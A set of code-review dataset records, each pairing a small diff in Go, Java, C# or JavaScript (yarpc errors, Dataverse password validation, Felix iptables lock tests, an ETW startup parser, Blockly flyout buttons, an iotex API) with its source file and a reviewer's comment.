@@ -63,3 +63,18 @@ func IsUnrecognizedProcedureError(err error) bool { _, ok := err.(errors.UnrecognizedProcedureError) return ok } + +// UnrecognizedEncodingError returns an error for the given request, such that +// IsUnrecognizedEncodingError can distinguish it from other errors coming out +// of router.Choose. +func UnrecognizedEncodingError(req *Request, want []string) error { + return errors.RouterUnrecognizedEncodingError(want, string(req.Encoding)) +} + +// IsUnrecognizedEncodingError returns true for errors returned by +// Router.Choose if the router cannot find a handler for the request's +// encoding. +func IsUnrecognizedEncodingError(err error) bool { + _, ok := err.(errors.UnrecognizedEncodingError) + return ok +}
1
// Copyright (c) 2017 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package transport import "go.uber.org/yarpc/internal/errors" // InboundBadRequestError builds an error which indicates that an inbound // cannot process a request because it is a bad request. // // IsBadRequestError returns true for these errors. func InboundBadRequestError(err error) error { return errors.HandlerBadRequestError(err) } // IsBadRequestError returns true if the request could not be processed // because it was invalid. func IsBadRequestError(err error) bool { _, ok := err.(errors.BadRequestError) return ok } // IsUnexpectedError returns true if the server panicked or failed to process // the request with an unhandled error. func IsUnexpectedError(err error) bool { _, ok := err.(errors.UnexpectedError) return ok } // IsTimeoutError return true if the given error is a TimeoutError. func IsTimeoutError(err error) bool { _, ok := err.(errors.TimeoutError) return ok } // UnrecognizedProcedureError returns an error for the given request, // such that IsUnrecognizedProcedureError can distinguish it from other errors // coming out of router.Choose. func UnrecognizedProcedureError(req *Request) error { return errors.RouterUnrecognizedProcedureError(req.Service, req.Procedure) } // IsUnrecognizedProcedureError returns true for errors returned by // Router.Choose if the router cannot find a handler for the request. func IsUnrecognizedProcedureError(err error) bool { _, ok := err.(errors.UnrecognizedProcedureError) return ok }
1
13,933
Do we really need these? This is expanding on an API that we're about to do work on with the error stuff @kriskowal
yarpc-yarpc-go
go
@@ -146,11 +146,9 @@ public class PasswordValidatorServiceBean implements java.io.Serializable { * @return A List with error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime, boolean isHumanReadable) { -// public List<String> validate(String password, boolean isHumanReadable) { init(); - final PasswordData passwordData = PasswordData.newInstance(password, String.valueOf(passwordModificationTime.getTime()), null); -// final PasswordData passwordData = PasswordData.newInstance(password, "username", null); + final PasswordData passwordData = new PasswordData(password); final RuleResult result = new RuleResult(); for (PasswordValidator currentUser : validators.values()) {
1
package edu.harvard.iq.dataverse.validation; import edu.harvard.iq.dataverse.util.BundleUtil; import edu.harvard.iq.dataverse.util.SystemConfig; import java.io.File; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.IOException; import java.net.URL; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Properties; import java.util.logging.Level; import java.util.logging.Logger; import java.util.regex.Pattern; import java.util.stream.Collectors; import javax.ejb.EJB; import javax.ejb.Stateless; import javax.inject.Named; import org.passay.CharacterCharacteristicsRule; import org.passay.CharacterRule; import org.passay.DictionaryRule; import org.passay.DictionarySubstringRule; import org.passay.IllegalRegexRule; import org.passay.LengthRule; import org.passay.PasswordData; import org.passay.PasswordValidator; import org.passay.PropertiesMessageResolver; import org.passay.Rule; import org.passay.RuleResult; import org.passay.RuleResultDetail; import org.passay.dictionary.WordListDictionary; import org.passay.dictionary.WordLists; import org.passay.dictionary.sort.ArraysSort; /** * PasswordValidatorServiceBean * <p> * The purpose of this class is to validate passwords according to a set of rules as described in: * https://github.com/IQSS/dataverse/issues/3150 * These contemporary rules govern the way passwords and accounts are protected in order to keep up with current level 3 * sensitivity data standards. * <p> * This class will offer presets: * Rule 1. It will use a dictionary to block the use of commonly used passwords. * <p> * Rule 2. It will include at least one character from at least three out of of these four categories: * Uppercase letter * Lowercase letter * Digit * Special character ( a whitespace is not a character ) * <p> * Rule 3. It will allow either: * a. 8 password length minimum with an annual password expiration * b. 10 password length minimum * <p> * Rule 4. It will forgo all the above three requirements for passwords that have a minimum length of 20. * <p> * All presets can be tweaked by applying new settings via the admin API. * <p> * Two validator types implement the rulesets. * GoodStrengthValidator: applies rule 4 for passwords with a length equal or greater than MIN_LENGTH_BIG_LENGTH * StandardValidator: applies rules 1, 2 and 3 for passwords with a length less than MIN_LENGTH_BIG_LENGTH * <p> * For more information on the library used here, @see http://passay.org * * @author Lucien van Wouw <[email protected]> */ @Named @Stateless public class PasswordValidatorServiceBean implements java.io.Serializable { private static final Logger logger = Logger.getLogger(PasswordValidatorServiceBean.class.getCanonicalName()); //FIXME: hardcoding this dictionary... I think its overwritten but should remove or something. private static String DICTIONARY_FILES = "weak_passwords.txt"; private enum ValidatorTypes { GoodStrengthValidator, StandardValidator } @SuppressWarnings("unchecked") private final static LinkedHashMap<ValidatorTypes, PasswordValidator> validators = new LinkedHashMap(2); private int goodStrength; private int maxLength; private int minLength; private int numberOfCharacteristics; private int numberOfConsecutiveDigitsAllowed; List<CharacterRule> characterRules; private String dictionaries = DICTIONARY_FILES; private PropertiesMessageResolver messageResolver; @EJB SystemConfig systemConfig; public PasswordValidatorServiceBean() { final Properties properties = PropertiesMessageResolver.getDefaultProperties(); properties.setProperty(GoodStrengthRule.ERROR_CODE_GOODSTRENGTH, GoodStrengthRule.ERROR_MESSAGE_GOODSTRENGTH); messageResolver = new PropertiesMessageResolver(properties); } public PasswordValidatorServiceBean(List<CharacterRule> characterRules) { final Properties properties = PropertiesMessageResolver.getDefaultProperties(); properties.setProperty(GoodStrengthRule.ERROR_CODE_GOODSTRENGTH, GoodStrengthRule.ERROR_MESSAGE_GOODSTRENGTH); messageResolver = new PropertiesMessageResolver(properties); this.characterRules = characterRules; } /** * validate * * @param password the password to check * @return A List with human readable error messages. Empty when the password is valid. */ public List<String> validate(String password) { return validate(password, new Date()); } /** * validate * <p> * Validates the password properties and determine if their valid. * Password reset consumers would use this method, because there should be no modification date check for new * passwords. * * @param password the password to check * @param passwordModificationTime The time the password was set or changed. * @return A List with human readable error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime) { return validate(password, passwordModificationTime, true); } /** * validate * <p> * Validates the password properties and its modification date and determine if their valid. * * @param passwordModificationTime The time the password was set or changed. * @param password The password to check * @param isHumanReadable The expression of the error messages. True if the audience is human. * @return A List with error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime, boolean isHumanReadable) { // public List<String> validate(String password, boolean isHumanReadable) { init(); final PasswordData passwordData = PasswordData.newInstance(password, String.valueOf(passwordModificationTime.getTime()), null); // final PasswordData passwordData = PasswordData.newInstance(password, "username", null); final RuleResult result = new RuleResult(); for (PasswordValidator currentUser : validators.values()) { logger.fine("characterRules.size(): " + characterRules.size()); logger.fine("numberOfCharacteristics: " + numberOfCharacteristics); RuleResult r = currentUser.validate(passwordData); if (r.isValid()) return Collections.emptyList(); result.getDetails().addAll(r.getDetails()); } if (isHumanReadable) { return validators.get(ValidatorTypes.StandardValidator).getMessages(result); } else { return result.getDetails().stream().map(RuleResultDetail::getErrorCode).collect(Collectors.toList()); } } /** * init * <p> * Instantiates and caches the validators. */ private void init() { addStandardValidator(); addGoodStrengthValidator(); } /** * goodStrengthValidator * <p> * Apply Rule 4: It will forgo all the above three requirements for passwords that have a minimum length of * MIN_LENGTH_BIG_LENGTH. */ private void addGoodStrengthValidator() { int goodStrength = getGoodStrength(); if (goodStrength != 0) { PasswordValidator passwordValidator = validators.get(ValidatorTypes.GoodStrengthValidator); if (passwordValidator == null) { final GoodStrengthRule lengthRule = new GoodStrengthRule(); lengthRule.setMinimumLength(goodStrength); final List<Rule> rules = Collections.singletonList(lengthRule); passwordValidator = new PasswordValidator(messageResolver, rules); validators.put(ValidatorTypes.GoodStrengthValidator, passwordValidator); } } } /** * standardValidator * <p> * Apply Rules 1, 2 and 3. */ private void addStandardValidator() { int maxLength = getMaxLength(); int minLength = getMinLength(); int numberOfCharacteristics = getNumberOfCharacteristics(); int numberOfConsecutiveDigitsAllowed = getNumberOfConsecutiveDigitsAllowed(); PasswordValidator passwordValidator = validators.get(ValidatorTypes.StandardValidator); if (passwordValidator == null) { final List<Rule> rules = new ArrayList<>(4); rules.add(dictionarySubstringRule()); final LengthRule lengthRule = new LengthRule(); if (maxLength != 0) { lengthRule.setMaximumLength(maxLength); } if (minLength != 0) { lengthRule.setMinimumLength(minLength); } rules.add(lengthRule); if (numberOfCharacteristics != 0) { rules.add(characterRule(getCharacterRules())); } rules.add(repeatingDigitsRule(numberOfConsecutiveDigitsAllowed)); passwordValidator = new PasswordValidator(messageResolver, rules); validators.put(ValidatorTypes.StandardValidator, passwordValidator); } } /** * dictionaryRule * <p> * Reads in the getDictionaries from a file. * * @return A rule. */ private DictionaryRule dictionaryRule() { DictionaryRule rule = null; try { rule = new DictionaryRule( new WordListDictionary(WordLists.createFromReader( getDictionaries(), false, new ArraysSort()))); } catch (IOException e) { logger.log(Level.CONFIG, e.getMessage()); } return rule; } /** * dictionarySubstringRule * <p> * Reads in the getDictionaries from a file. * Substring means that passwords containing a dictionary string fail. * * @return A rule. */ private DictionarySubstringRule dictionarySubstringRule() { DictionarySubstringRule rule = null; try { rule = new DictionarySubstringRule( new WordListDictionary(WordLists.createFromReader( getDictionaries(), false, new ArraysSort()))); } catch (IOException e) { logger.log(Level.CONFIG, e.getMessage()); } return rule; } /** * getDictionaries * * @return A list of readers for each dictionary. */ private FileReader[] getDictionaries() { setDictionaries(systemConfig == null ? this.dictionaries : systemConfig.getPVDictionaries()); List<String> files = Arrays.asList(this.dictionaries.split(",")); List<FileReader> fileReaders = new ArrayList<>(files.size()); files.forEach(file -> { try { fileReaders.add(new FileReader(file)); } catch (FileNotFoundException e) { logger.log(Level.CONFIG, e.getMessage()); } }); if (fileReaders.size() == 0) logger.fine(BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnDictionaryRead")); return fileReaders.toArray(new FileReader[fileReaders.size()]); } void setDictionaries(String dictionaries) { if (dictionaries == null) { final URL url = PasswordValidatorServiceBean.class.getResource(DICTIONARY_FILES); if (url == null) { logger.fine(BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnDictionaryObj")+" " + DICTIONARY_FILES); dictionaries = DICTIONARY_FILES; } else dictionaries = url.getPath() + File.pathSeparator + url.getFile(); } if (!dictionaries.equals(this.dictionaries)) { this.dictionaries = dictionaries; validators.remove(ValidatorTypes.StandardValidator); } } /** * characterRule * <p> * Sets a this number of characteristics N from M rules. * * @return A CharacterCharacteristicsRule */ private CharacterCharacteristicsRule characterRule(List<CharacterRule> characterRules) { final CharacterCharacteristicsRule characteristicsRule = new CharacterCharacteristicsRule(); characteristicsRule.setNumberOfCharacteristics(getNumberOfCharacteristics()); characteristicsRule.getRules().addAll(characterRules); return characteristicsRule; } private IllegalRegexRule repeatingDigitsRule(int numConsecutiveDigitsAllowed) { int complainAboutThisManyConsecutiveDigits = numConsecutiveDigitsAllowed; if (numConsecutiveDigitsAllowed != Integer.MAX_VALUE) { // The check above is to avoid overflowing the int. MAX_VALUE is how we disable the setting. complainAboutThisManyConsecutiveDigits = numConsecutiveDigitsAllowed + 1; } Pattern pattern = Pattern.compile("\\d{" + complainAboutThisManyConsecutiveDigits + "}"); return new IllegalRegexRule(pattern.pattern()); } /** * parseMessages * * @param messages A list of error messages * @return A Human readable string. */ // TODO: Figure out if we need this. We are probably going will custom messages rather than whatever Passay emits. public static String parseMessages(List<String> messages) { return messages.stream() .map(Object::toString) .collect(Collectors.joining(" \n")); } /** * getGoodPasswordDescription * <p> * Describes all the characteristics of a valid password. */ public String getGoodPasswordDescription(List<String> errors) { boolean dictionaryEnabled = false; String dictionariesSetting = systemConfig.getPVDictionaries(); logger.fine("dictionariesSetting: " + dictionariesSetting); if (dictionariesSetting != null && !dictionariesSetting.isEmpty()) { dictionaryEnabled = true; } logger.fine("dictionaryEnabled: " + dictionaryEnabled); if (errors == null){ errors = new ArrayList<>(); } return PasswordValidatorUtil.getPasswordRequirements(getMinLength(), getMaxLength(), getCharacterRules(), getNumberOfCharacteristics(), getNumberOfConsecutiveDigitsAllowed(), getGoodStrength(), dictionaryEnabled, errors); } /** * getGoodStrength * <p> * Get the length for the GoodStrengthValidator that determines what is a long, hard to brute force password. * * @return A length */ private int getGoodStrength() { int goodStrength = systemConfig == null ? this.goodStrength : systemConfig.getPVGoodStrength(); setGoodStrength(goodStrength); return this.goodStrength; } void setGoodStrength(int goodStrength) { if (goodStrength == 0) validators.remove(ValidatorTypes.GoodStrengthValidator); else { int minLength = getMinLength(); if (goodStrength <= minLength) { int reset = minLength + 1; logger.log(Level.WARNING, BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnSetStrength" , Arrays.asList(Integer.toString(goodStrength),Integer.toString(minLength),Integer.toString(reset)))); goodStrength = reset; } } if (this.goodStrength != goodStrength) { this.goodStrength = goodStrength; validators.remove(ValidatorTypes.GoodStrengthValidator); } } /** * getMaxLength * <p> * The maximum password length for the StandardValidator * * @return A length */ private int getMaxLength() { int maxLength = systemConfig == null ? this.maxLength : systemConfig.getPVMaxLength(); setMaxLength(maxLength); return this.maxLength; } void setMaxLength(int maxLength) { if (this.maxLength != maxLength) { this.maxLength = maxLength; validators.remove(ValidatorTypes.StandardValidator); } } /** * getMinLength * <p> * The minimum password length for the StandardValidator. * * @return A length */ private int getMinLength() { int minLength = systemConfig == null ? this.minLength : systemConfig.getPVMinLength(); setMinLength(minLength); return this.minLength; } void setMinLength(int minLength) { if (this.minLength != minLength) { this.minLength = minLength; validators.remove(ValidatorTypes.StandardValidator); } } public void setCharacterRules(List<CharacterRule> characterRules) { if(!characterRules.equals(this.characterRules)) { this.characterRules = characterRules; validators.remove(ValidatorTypes.StandardValidator); } } public List<CharacterRule> getCharacterRules() { List<CharacterRule> characterRules = systemConfig == null ? this.characterRules : systemConfig.getPVCharacterRules(); setCharacterRules(characterRules); return this.characterRules; } void setNumberOfCharacteristics(int numberOfCharacteristics) { if (this.numberOfCharacteristics != numberOfCharacteristics) { this.numberOfCharacteristics = numberOfCharacteristics; validators.remove(ValidatorTypes.StandardValidator); } } public int getNumberOfCharacteristics() { int numberOfCharacteristics = systemConfig == null ? this.numberOfCharacteristics : systemConfig.getPVNumberOfCharacteristics(); setNumberOfCharacteristics(numberOfCharacteristics); return this.numberOfCharacteristics; } public int getNumberOfConsecutiveDigitsAllowed() { int numConsecutiveDigitsAllowed = systemConfig == null ? this.numberOfConsecutiveDigitsAllowed : systemConfig.getPVNumberOfConsecutiveDigitsAllowed(); setNumberOfConsecutiveDigitsAllowed(numConsecutiveDigitsAllowed); return this.numberOfConsecutiveDigitsAllowed; } public void setNumberOfConsecutiveDigitsAllowed(int numberOfConsecutiveDigitsAllowed) { this.numberOfConsecutiveDigitsAllowed = numberOfConsecutiveDigitsAllowed; } }
1
45,048
passwordModificationTime is no longer used - did the change drop a time check that should be restored? Or should the param get dropped from the methods?
IQSS-dataverse
java
@@ -40,7 +40,7 @@ namespace ScenarioMeasurement source.Kernel.ProcessStart += evt => { - if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine == commandLine) + if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine.Trim() == commandLine.Trim()) { if (pid.HasValue) {
1
using Microsoft.Diagnostics.Tracing; using Microsoft.Diagnostics.Tracing.Parsers; using Microsoft.Diagnostics.Tracing.Session; using Reporting; using System; using System.Collections.Generic; using System.Linq; namespace ScenarioMeasurement { // [EventSource(Guid = "9bb228bd-1033-5cf0-1a56-c2dbbe0ebc86")] // class PerfLabGenericEventSource : EventSource // { // public static PerfLabGenericEventSource Log = new PerfLabGenericEventSource(); // public void Startup() => WriteEvent(1); // } internal class GenericStartupParser : IParser { public void EnableKernelProvider(TraceEventSession kernel) { kernel.EnableKernelProvider((KernelTraceEventParser.Keywords)(KernelTraceEventParser.Keywords.Process | KernelTraceEventParser.Keywords.Thread | KernelTraceEventParser.Keywords.ContextSwitch)); } public void EnableUserProviders(TraceEventSession user) { user.EnableProvider("PerfLabGenericEventSource"); } public IEnumerable<Counter> Parse(string mergeTraceFile, string processName, IList<int> pids, string commandLine) { var results = new List<double>(); var threadTimes = new List<double>(); double threadTime = 0; var ins = new Dictionary<int, double>(); double start = -1; int? pid = null; using (var source = new ETWTraceEventSource(mergeTraceFile)) { source.Kernel.ProcessStart += evt => { if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine == commandLine) { if (pid.HasValue) { // Processes might be reentrant. For now this traces the first (outermost) process of a given name. return; } pid = evt.ProcessID; start = evt.TimeStampRelativeMSec; } }; source.Kernel.ThreadCSwitch += evt => { if (!pid.HasValue) // we're currently in a measurement interval return; if (evt.NewProcessID != pid && evt.OldProcessID != pid) return; // but this isn't our process if (evt.OldProcessID == pid) // this is a switch out from our process { if (ins.TryGetValue(evt.OldThreadID, out var value)) // had we ever recorded a switch in for this thread? { threadTime += evt.TimeStampRelativeMSec - value; ins.Remove(evt.OldThreadID); } } else // this is a switch in to our process { ins[evt.NewThreadID] = evt.TimeStampRelativeMSec; } }; source.Dynamic.AddCallbackForProviderEvent("PerfLabGenericEventSource", "Startup", evt => { if (pid.HasValue && evt.ProcessID == pid && evt.ProcessName.Equals(processName, StringComparison.OrdinalIgnoreCase)) { results.Add(evt.TimeStampRelativeMSec - start); threadTimes.Add(threadTime); pid = null; threadTime = 0; start = 0; } }); source.Process(); } return new[] { new Counter() { Name = "Generic Startup", MetricName = "ms", Results = results.ToArray() }, new Counter() { Name = "Time on Thread", MetricName = "ms", Results = threadTimes.ToArray() } }; } } }
1
10,466
Would it break here without trim? If so, can we do trim in Startup.cs so we don't need to add this code to every parser?
dotnet-performance
.cs
@@ -115,7 +115,7 @@ var _ = Describe("with running container", func() { It("iptables should succeed in getting the lock after 3s", func() { iptCmd := cmdInContainer("iptables", "-w", "3", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() - Expect(string(out)).To(ContainSubstring("Another app is currently holding the xtables lock")) + log.Printf("iptables output='%s'", out) Expect(err).NotTo(HaveOccurred()) })
1
// +build fvtests // Copyright (c) 2017 Tigera, Inc. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package fv_test import ( "bufio" "fmt" "os" "os/exec" "strings" "time" log "github.com/Sirupsen/logrus" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" ) var _ = Describe("with running container", func() { var containerIdx int var containerName string var felixCmd *exec.Cmd cmdInContainer := func(cmd ...string) *exec.Cmd { arg := []string{"exec", containerName} arg = append(arg, cmd...) return exec.Command("docker", arg...) } BeforeEach(func() { containerName = fmt.Sprintf("felix-fv-%d-%d", os.Getpid(), containerIdx) containerIdx++ myDir, err := os.Getwd() Expect(err).NotTo(HaveOccurred()) log.WithFields(log.Fields{ "name": containerName, "myDir": myDir, }).Info("Starting a Felix container") // Run a felix container. The tests in this file don't actually rely on Felix // but the calico/felix container has all the iptables dependencies we need to // check the lock behaviour. Note: we don't map the host's iptables lock into the // container so the scope of the lock is limited to the container. felixCmd = exec.Command("docker", "run", "--rm", "--name", containerName, "-v", fmt.Sprintf("%s/..:/codebase", myDir), "--privileged", "calico/felix") err = felixCmd.Start() Expect(err).NotTo(HaveOccurred()) log.Info("Waiting for container to be listed in docker ps") start := time.Now() for { cmd := exec.Command("docker", "ps") out, err := cmd.CombinedOutput() Expect(err).NotTo(HaveOccurred()) if strings.Contains(string(out), containerName) { break } if time.Since(start) > 10*time.Second { log.Panic("Timed out waiting for container to be listed.") } } }) AfterEach(func() { // Send an interrupt to ensure that docker gracefully shuts down the container. // If we kill the docker process then it detaches the container. log.Info("Stopping Felix container") felixCmd.Process.Signal(os.Interrupt) }) Describe("with the lock being held for 2s", func() { var lockCmd *exec.Cmd BeforeEach(func() { // Start the iptables-locker, which is a simple test app that locks // the iptables lock and then releases it after a timeout. log.Info("Starting iptables-locker") lockCmd = cmdInContainer("/codebase/bin/iptables-locker", "2s") stdErr, err := lockCmd.StderrPipe() Expect(err).NotTo(HaveOccurred()) lockCmd.Start() // Wait for the iptables-locker to tell us that it actually acquired the // lock. log.Info("Waiting for iptables-locker to acquire lock") scanner := bufio.NewScanner(stdErr) Expect(scanner.Scan()).To(BeTrue()) Expect(scanner.Text()).To(Equal("LOCKED")) Expect(scanner.Err()).NotTo(HaveOccurred()) log.Info("iptables-locker acquired lock") }) It("iptables should fail to get the lock in 1s", func() { iptCmd := cmdInContainer("iptables", "-w", "1", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() Expect(string(out)).To(ContainSubstring("Stopped waiting")) Expect(err).To(HaveOccurred()) }) It("iptables should succeed in getting the lock after 3s", func() { iptCmd := cmdInContainer("iptables", "-w", "3", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() Expect(string(out)).To(ContainSubstring("Another app is currently holding the xtables lock")) Expect(err).NotTo(HaveOccurred()) }) AfterEach(func() { if lockCmd != nil { log.Info("waiting for iptables-locker to finish") err := lockCmd.Wait() Expect(err).NotTo(HaveOccurred()) } }) }) })
1
15,555
Since we're using Logrus, probably best to use `Infof` to avoid confusion (Logrus' Printf behaves differently to the built in one)
projectcalico-felix
go
@@ -155,13 +155,14 @@ Blockly.FlyoutButton.prototype.createDom = function() { this.svgGroup_); svgText.textContent = this.text_; - this.width = svgText.getComputedTextLength() + - 2 * Blockly.FlyoutButton.MARGIN; + this.width = svgText.getComputedTextLength(); if (!this.isLabel_) { + this.width += 2 * Blockly.FlyoutButton.MARGIN; shadow.setAttribute('width', this.width); shadow.setAttribute('height', this.height); } + rect.setAttribute('width', this.width); rect.setAttribute('height', this.height);
1
/** * @license * Visual Blocks Editor * * Copyright 2016 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Class for a button in the flyout. * @author [email protected] (Rachel Fenichel) */ 'use strict'; goog.provide('Blockly.FlyoutButton'); goog.require('goog.dom'); goog.require('goog.math.Coordinate'); /** * Class for a button in the flyout. * @param {!Blockly.WorkspaceSvg} workspace The workspace in which to place this * button. * @param {!Blockly.WorkspaceSvg} targetWorkspace The flyout's target workspace. * @param {!Element} xml The XML specifying the label/button. * @param {boolean} isLabel Whether this button should be styled as a label. * @constructor */ Blockly.FlyoutButton = function(workspace, targetWorkspace, xml, isLabel) { // Labels behave the same as buttons, but are styled differently. /** * @type {!Blockly.WorkspaceSvg} * @private */ this.workspace_ = workspace; /** * @type {!Blockly.Workspace} * @private */ this.targetWorkspace_ = targetWorkspace; /** * @type {string} * @private */ this.text_ = xml.getAttribute('text'); /** * @type {!goog.math.Coordinate} * @private */ this.position_ = new goog.math.Coordinate(0, 0); /** * Whether this button should be styled as a label. * @type {boolean} * @private */ this.isLabel_ = isLabel; /** * Function to call when this button is clicked. * @type {function(!Blockly.FlyoutButton)} * @private */ this.callback_ = null; var callbackKey = xml.getAttribute('callbackKey'); if (this.isLabel_ && callbackKey) { console.warn('Labels should not have callbacks. Label text: ' + this.text_); } else if (!this.isLabel_ && !(callbackKey && targetWorkspace.getButtonCallback(callbackKey))) { console.warn('Buttons should have callbacks. Button text: ' + this.text_); } else { this.callback_ = targetWorkspace.getButtonCallback(callbackKey); } /** * If specified, a CSS class to add to this button. * @type {?string} * @private */ this.cssClass_ = xml.getAttribute('web-class') || null; }; /** * The margin around the text in the button. */ Blockly.FlyoutButton.MARGIN = 40; /** * The width of the button's rect. * @type {number} */ Blockly.FlyoutButton.prototype.width = 0; /** * The height of the button's rect. * @type {number} */ Blockly.FlyoutButton.prototype.height = 40; // Can't be computed like the width /** * Opaque data that can be passed to Blockly.unbindEvent_. * @type {Array.<!Array>} * @private */ Blockly.FlyoutButton.prototype.onMouseUpWrapper_ = null; /** * Create the button elements. * @return {!Element} The button's SVG group. */ Blockly.FlyoutButton.prototype.createDom = function() { var cssClass = this.isLabel_ ? 'blocklyFlyoutLabel' : 'blocklyFlyoutButton'; if (this.cssClass_) { cssClass += ' ' + this.cssClass_; } this.svgGroup_ = Blockly.utils.createSvgElement('g', {'class': cssClass}, this.workspace_.getCanvas()); if (!this.isLabel_) { // Shadow rectangle (light source does not mirror in RTL). var shadow = Blockly.utils.createSvgElement('rect', {'class': 'blocklyFlyoutButtonShadow', 'rx': 4, 'ry': 4, 'x': 1, 'y': 1}, this.svgGroup_); } // Background rectangle. var rect = Blockly.utils.createSvgElement('rect', {'class': this.isLabel_ ? 'blocklyFlyoutLabelBackground' : 'blocklyFlyoutButtonBackground', 'rx': 4, 'ry': 4}, this.svgGroup_); var svgText = Blockly.utils.createSvgElement('text', {'class': this.isLabel_ ? 'blocklyFlyoutLabelText' : 'blocklyText', 'x': 0, 'y': 0, 'text-anchor': 'middle'}, this.svgGroup_); svgText.textContent = this.text_; this.width = svgText.getComputedTextLength() + 2 * Blockly.FlyoutButton.MARGIN; if (!this.isLabel_) { shadow.setAttribute('width', this.width); shadow.setAttribute('height', this.height); } rect.setAttribute('width', this.width); rect.setAttribute('height', this.height); svgText.setAttribute('text-anchor', 'middle'); svgText.setAttribute('alignment-baseline', 'central'); svgText.setAttribute('x', this.width / 2); svgText.setAttribute('y', this.height / 2); this.updateTransform_(); this.mouseUpWrapper_ = Blockly.bindEventWithChecks_(this.svgGroup_, 'mouseup', this, this.onMouseUp_); return this.svgGroup_; }; /** * Correctly position the flyout button and make it visible. */ Blockly.FlyoutButton.prototype.show = function() { this.updateTransform_(); this.svgGroup_.setAttribute('display', 'block'); }; /** * Update svg attributes to match internal state. * @private */ Blockly.FlyoutButton.prototype.updateTransform_ = function() { this.svgGroup_.setAttribute('transform', 'translate(' + this.position_.x + ',' + this.position_.y + ')'); }; /** * Move the button to the given x, y coordinates. * @param {number} x The new x coordinate. * @param {number} y The new y coordinate. */ Blockly.FlyoutButton.prototype.moveTo = function(x, y) { this.position_.x = x; this.position_.y = y; this.updateTransform_(); }; /** * Get the button's target workspace. * @return {!Blockly.WorkspaceSvg} The target workspace of the flyout where this * button resides. */ Blockly.FlyoutButton.prototype.getTargetWorkspace = function() { return this.targetWorkspace_; }; /** * Dispose of this button. */ Blockly.FlyoutButton.prototype.dispose = function() { if (this.onMouseUpWrapper_) { Blockly.unbindEvent_(this.onMouseUpWrapper_); } if (this.svgGroup_) { goog.dom.removeNode(this.svgGroup_); this.svgGroup_ = null; } this.workspace_ = null; this.targetWorkspace_ = null; }; /** * Do something when the button is clicked. * @param {!Event} e Mouse up event. * @private */ Blockly.FlyoutButton.prototype.onMouseUp_ = function(e) { var gesture = this.targetWorkspace_.getGesture(e); if (gesture) { gesture.cancel(); } // Call the callback registered to this button. if (this.callback_) { this.callback_(this); } };
1
8,646
Hm, this looks like a change that should go upstream as well.
LLK-scratch-blocks
js
@@ -1533,16 +1533,6 @@ func (core *coreService) ChainID() uint32 { return core.bc.ChainID() } -// GetActionByActionHash returns action by action hash -func (core *coreService) ActionByActionHash(h hash.Hash256) (action.SealedEnvelope, error) { - if !core.hasActionIndex || core.indexer == nil { - return action.SealedEnvelope{}, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) - } - - selp, _, _, _, err := core.getActionByActionHash(h) - return selp, err -} - // ReadContractStorage reads contract's storage func (core *coreService) ReadContractStorage(ctx context.Context, addr address.Address, key []byte) ([]byte, error) { ctx, err := core.bc.Context(ctx)
1
